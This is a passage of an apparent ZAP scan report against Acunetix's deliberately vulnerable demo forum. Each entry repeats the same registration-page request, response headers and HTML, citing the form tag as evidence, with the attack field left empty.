<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
